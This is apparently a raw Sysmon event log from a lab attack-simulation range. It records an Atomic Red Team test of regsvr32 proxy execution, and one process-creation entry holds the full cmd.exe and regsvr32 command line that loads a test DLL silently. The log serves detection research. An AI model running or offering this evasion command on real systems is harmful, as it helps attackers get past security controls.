22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361829Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361828Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361827Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361826Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361825Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361824Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361823Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361822Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361821Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361820Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361819Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361818Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361817Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361816Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361815Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-337b-6013-8402-000000001100}16568356C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361814Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361813Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361812Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361811Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361810Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-3708-6013-b703-000000001100}608810844C:\Windows\system32\cmd.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+b638|C:\Windows\system32\cmd.exe+ab91|C:\Windows\system32\cmd.exe+b638|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361809Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 154100x8000000000000000361808Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.322{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\SysWOW64\regsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dllC:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=EB3B90B6989227F590BB36356DF96A30,SHA256=F80B4224C670E76E05A70CC5403818B11C7A4CA10542A1F9B5D935E4FCA08579,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8{8e433fbf-3708-6013-b703-000000001100}6088C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Temp\notregsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll )" 10341000x8000000000000000361807Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361806Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 